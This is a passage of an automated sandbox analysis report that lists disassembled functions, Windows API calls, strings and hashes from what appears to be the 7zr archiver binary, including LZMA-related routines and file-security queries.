                            • Opcode Fuzzy Hash: 812e42cd47a4f323bb90c2496fd6b8553b8ab3759fc7f4d00d41505b5efab4d8
                            • Instruction Fuzzy Hash: B051D031C0421AEEDF15EBE4D845BEDBB75AF13348F184159E85173192CB351A0AEB60
                            Function 00CB44C2 Relevance: 7.6, APIs: 6, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                            • memcmp.MSVCRT(?,00D548A0,00000010), ref: 00CB44DB
                            • memcmp.MSVCRT(?,00D50128,00000010), ref: 00CB44EE
                            • memcmp.MSVCRT(?,00D50228,00000010), ref: 00CB450B
                            • memcmp.MSVCRT(?,00D50248,00000010), ref: 00CB4528
                            • memcmp.MSVCRT(?,00D501C8,00000010), ref: 00CB4545
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID:
                            • API String ID: 1475443563-0
                            • Opcode ID: 5dbf5c1f13636986b589d125a204664d1e6b16b19ba9a088825375fdfa282b98
                            • Instruction ID: 21c9d2b0716e68fefae2213bc1424f2aa61ad75057c416f5b8ee00ae8544c8f7
                            • Opcode Fuzzy Hash: 5dbf5c1f13636986b589d125a204664d1e6b16b19ba9a088825375fdfa282b98
                            • Instruction Fuzzy Hash: 75215372B447086FEB188E159C81FFE77ACDB607A5F048125FD069A246FA64DE0886B1
                            Function 00CEC414 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 181COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: !$LZMA2:$LZMA:
                            • API String ID: 3519838083-3332058968
                            • Opcode ID: fab1ede6ba3233dc442d23c2bf92611be5d972cf11dd316723fc079bcd4e7563
                            • Instruction ID: df7892b84fe2c2a16004a59ac1889e17bacdd4aa02d19e27301669cd76bf8dd0
                            • Opcode Fuzzy Hash: fab1ede6ba3233dc442d23c2bf92611be5d972cf11dd316723fc079bcd4e7563
                            • Instruction Fuzzy Hash: C261E07190428A9FDB25CB66C4C9BFE7BB5AF16344F1440B9F415671A2C770AF82E740
                            Function 00CAA384 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CAA389
                              • Part of subcall function 00CAA4C5: GetModuleHandleW.KERNEL32(ntdll.dll,?,00CAA3C1,00000001), ref: 00CAA4CD
                              • Part of subcall function 00CAA4C5: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00CAA4DD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: AddressH_prologHandleModuleProc
                            • String ID: : $ SP:$Windows
                            • API String ID: 786088110-3655538264
                            • Opcode ID: d8b639a095260b54bbfe8771a6dbe58f940f0c109c9984f80e5a4c27025c768b
                            • Instruction ID: a0447546d585067f02059431990ddc61a21883136c4ed22e59683ba4bb07fe70
                            • Opcode Fuzzy Hash: d8b639a095260b54bbfe8771a6dbe58f940f0c109c9984f80e5a4c27025c768b
                            • Instruction Fuzzy Hash: E1313231C0022A9BCF15FBA9C8539EEBBB4BF19718F400069F502721D1DF755A85EB61
                            Function 00CD6025 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CD602A
                            • EnterCriticalSection.KERNEL32(00D62938), ref: 00CD6044
                            • LeaveCriticalSection.KERNEL32(00D62938), ref: 00CD6060
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterH_prologLeave
                            • String ID: v
                            • API String ID: 367238759-3261393531
                            • Opcode ID: 2d07ff20acb8ecf5133221b07081bc114d6577a64064e3ca6474ce580586b86a
                            • Instruction ID: 4ded55e9ed9b4349b5c4bf421bd5cfab7248f743426c515b43e080c0709ecae5
                            • Opcode Fuzzy Hash: 2d07ff20acb8ecf5133221b07081bc114d6577a64064e3ca6474ce580586b86a
                            • Instruction Fuzzy Hash: 04F01776911214EFC705DF98D949A9EBBB8EF56350F14806AF405E7311C7B59A00CBB4
                            Function 00CAA4C5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,00CAA3C1,00000001), ref: 00CAA4CD
                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00CAA4DD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: RtlGetVersion$ntdll.dll
                            • API String ID: 1646373207-1489217083
                            • Opcode ID: 9a3b9336b835b85a6d18117117012e692148af9c9a95668b77eb5f66fa692af3
                            • Instruction ID: b43341a693d5a63d26ce674d4604f8e40bc8dcff51a6325d642fd62732eb2769
                            • Opcode Fuzzy Hash: 9a3b9336b835b85a6d18117117012e692148af9c9a95668b77eb5f66fa692af3
                            • Instruction Fuzzy Hash: 86D0C7713763111FB6B0AAB47C0EBEA165C8F46B55705A456F810D1140FBD49E8245B1
                            Function 00CC0306 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,00000000,?), ref: 00CC0359
                            • GetLastError.KERNEL32(?,?,00000000,?), ref: 00CC0382
                            • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,?,00000000,?), ref: 00CC03DA
                            • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,?), ref: 00CC03F0
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorFileLastSecurity
                            • String ID:
                            • API String ID: 555121230-0
                            • Opcode ID: 16598c877c9e73c379e4e0a6711d284c4e80e1d1181401f06e066184a1975e9b
                            • Instruction ID: a70eeae53872204c6d10cd77197372d1f8083fc3f7b582c74d30ccb6af582787
                            • Opcode Fuzzy Hash: 16598c877c9e73c379e4e0a6711d284c4e80e1d1181401f06e066184a1975e9b
                            • Instruction Fuzzy Hash: 15312974900249EFDB10DFA8C880FAEBBB5FF44344F248959E566D7261D770AA41DB60
                            Function 00CA82FB Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CA8300
                            • GetFileInformationByHandle.KERNEL32(000000FF,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 00CA834F
                            • DeviceIoControl.KERNEL32(000000FF,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 00CA837C
                            • memcpy.MSVCRT(?,?,?,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 00CA839B
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ControlDeviceFileH_prologHandleInformationfreememcpy
                            • String ID:
                            • API String ID: 1689166341-0
                            • Opcode ID: 71b375dc9100fa8d175c9ae65276cda9f7cf0c6ad691f08014ae78714921efc0
                            • Instruction ID: 66b9c63f0d8def611a5fb18824da0d90f734de0cb09eb6ec5252f7b2d56afc66
                            • Opcode Fuzzy Hash: 71b375dc9100fa8d175c9ae65276cda9f7cf0c6ad691f08014ae78714921efc0
                            • Instruction Fuzzy Hash: 7F21F2B2901209AFDF209F94DC85AEEBBB9EF96744F14002DF814A3291CA324E04DA70
                            Function 00CE60D2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: BlockPackSize$BlockUnpackSize
                            • API String ID: 3519838083-5494122
                            • Opcode ID: fcfe0a339a10489e9856001768cf77fa33638367e9eb4d2e95afdbecd67fb3a1
                            • Instruction ID: 1e8a72bceacabdc46ad1275b5524a5a710c98be2fdceb7223834bf5aa0f2b651
                            • Opcode Fuzzy Hash: fcfe0a339a10489e9856001768cf77fa33638367e9eb4d2e95afdbecd67fb3a1
                            • Instruction Fuzzy Hash: 1451E6718242C59ECF3ACB6684A1BFD7BB1AF36384F18405ED27693191D6215E8CE705
                            Function 00CAA4F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CAA4F8
                              • Part of subcall function 00CAA384: __EH_prolog.LIBCMT ref: 00CAA389
                              • Part of subcall function 00CA9E14: GetSystemInfo.KERNEL32(?), ref: 00CA9E36
                              • Part of subcall function 00CA9E14: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00CA9E50
                              • Part of subcall function 00CA9E14: GetProcAddress.KERNEL32(00000000), ref: 00CA9E57
                            • strcmp.MSVCRT ref: 00CAA564
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
                            • String ID: -
                            • API String ID: 2798778560-3695764949
                            • Opcode ID: a3404d1b36a92e941f75c240681c66fac5dda8592b20cbe4dbe0b14943d11eba
                            • Instruction ID: 7133d062338b144b59e9365f206174bff343d62dd0308801249273718472c959
                            • Opcode Fuzzy Hash: a3404d1b36a92e941f75c240681c66fac5dda8592b20cbe4dbe0b14943d11eba
                            • Instruction Fuzzy Hash: 0E319C32C0121B9BCF19FBE4D8569EDB7B5EF16308F10002AF41172191DB359B45EAA1
                            Function 00CD6184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0$x
                            • API String ID: 3519838083-1948001322
                            • Opcode ID: 08bb8a1f6f767fa96080ac84c04e8bfe1380185a97634db5dd0aff24f0bb40e9
                            • Instruction ID: 386046952a573bae095aa0a7b9a2907d89777670c525de856c55f23dd335c75d
                            • Opcode Fuzzy Hash: 08bb8a1f6f767fa96080ac84c04e8bfe1380185a97634db5dd0aff24f0bb40e9
                            • Instruction Fuzzy Hash: E0216D36D0112E9BCF04EF98D996AEDB7B5FF49308F14002AE911B7281DB795E04CBA0
                            Function 00CD82DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID: =
                            • API String ID: 1795875747-2525689732
                            • Opcode ID: c85b6f0acc5e53a1a3915757417ba134032c9444299169feae3d4fb6a8adbada
                            • Instruction ID: b880237d80f937e8b441dc41911c8a32c1afcf7c136cd2f43b848c05a8c63b4f
                            • Opcode Fuzzy Hash: c85b6f0acc5e53a1a3915757417ba134032c9444299169feae3d4fb6a8adbada
                            • Instruction Fuzzy Hash: AFE0DF75A00219ABCB00ABE99C41CAE7B69FB85314B040823E920DB351FA70D929CBE0
                            Function 00D041C0 Relevance: 5.1, APIs: 4, Instructions: 57COMMON
                            Download Yara Rule
                            APIs
                            • memcmp.MSVCRT(?,00D548A0,00000010), ref: 00D041D6
                            • memcmp.MSVCRT(?,00D50168,00000010), ref: 00D041F1
                            • memcmp.MSVCRT(?,00D501E8,00000010), ref: 00D04205
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID:
                            • API String ID: 1475443563-0
                            • Opcode ID: 0c4b1e05c68473f3dbc5e249a425e1e6e77816d85fc8f20c4d4647ff9d102a1c
                            • Instruction ID: 11aca8f575d3b30c92206837ae421496d01d71cf2f32c29388adcc9d2210aee1
                            • Opcode Fuzzy Hash: 0c4b1e05c68473f3dbc5e249a425e1e6e77816d85fc8f20c4d4647ff9d102a1c
                            • Instruction Fuzzy Hash: FB0104B17803086BDB108B21CC82FBE77A89B65721F044428FF89DB281F6B4E9448275